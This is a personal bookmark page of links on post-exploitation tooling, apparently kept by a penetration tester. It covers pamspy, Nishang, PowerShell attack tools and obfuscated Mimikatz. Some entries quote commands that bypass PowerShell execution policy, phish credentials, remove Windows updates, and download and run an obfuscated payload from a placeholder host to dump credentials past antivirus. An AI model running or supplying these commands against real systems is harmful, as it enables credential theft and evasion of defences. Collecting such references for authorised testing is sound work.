776 links
  • Shared Bookmarks
  • Home
  • Login
  • RSS Feed
  • ATOM Feed
  • Tag cloud
  • Picture wall
  • Daily
Links per page: 20 50 100
5 results tagged postex x
  • thumbnail
    citronneur/pamspy: Credentials Dumper for Linux using eBPF
    September 20, 2022 at 10:46:38 PM UTC - permalink -
    QRCode
    - https://github.com/citronneur/pamspy
    rootkit postex ebpf pass creds pam ssh 3snake
  • FuzzySecurity | Windows Privilege Escalation Fundamentals
    March 7, 2019 at 7:16:45 PM UTC * - permalink -
    QRCode
    - https://www.fuzzysecurity.com/tutorials/16.html
    windows hacking post exploitation postex privesc privilege escalation fuzzy cheatsheet
  • thumbnail
    Nishang: A Post-Exploitation Framework

    Port-Scan

    Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Port-Scan.ps1’; Port-Scan –StartAddress 192.168.56.101 –Endaddress 192.168.56.105 –ResolveHost -ScanPort }”

    Remove-Update

    Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Remove-Update.ps1’; Remove-Update KB2534366}”

    Invoke-CredentialsPhish

    Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1’; Invoke-CredentialsPhish}”

    February 20, 2019 at 11:00:59 PM UTC - permalink -
    QRCode
    - https://resources.infosecinstitute.com/nishang-a-post-exploitation-framework/
    nishang scripts tool windows post exploitation postex postexploitation hacking pentest powershell
  • thumbnail
    Pwning the Enterprise With PowerShell

    PowerMeta - Discover publicly available files, extract metadata, provide information about internal username schema, system names, domain info ... https://github.com/dathack/PowerMeta
    MailSniper, powercat, empire, unicorn, dnscat2-powershell, invoke-powershellicmp, ...

    February 20, 2019 at 10:17:58 PM UTC - permalink -
    QRCode
    - https://fr.slideshare.net/dafthack/pwning-the-enterprise-with-powershell
    powersploit powershell windows exploitation post postex postexploitation tools mimikatz powermeta mailsniper empire unicorn
  • thumbnail
    geoda: Running an Obfuscated version of Mimikatz in Memory to bypass AntiVirus and other host based controls

    https://github.com/danielbohannon/Invoke-Obfuscation

    PS > Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation
    Invoke-Obfuscation > set SCRIPTBLOCK "iEX (New-Object System.Net.WebClient).DownloadString('https://<IP>:<PORT>/obfuscated.ps1'); Invoke-Mimidogz -DumpCred
    ...
    February 20, 2019 at 2:24:52 PM UTC - permalink -
    QRCode
    - https://blog.geoda-security.com/2018/05/running-obfuscated-version-of-mimikatz.html
    powershell mimikatz postexploitation postex post exploitation obfuscation kiwi
Links per page: 20 50 100
Shaarli - The personal, minimalist, super fast, database-free, bookmarking service by the Shaarli community - Help/documentation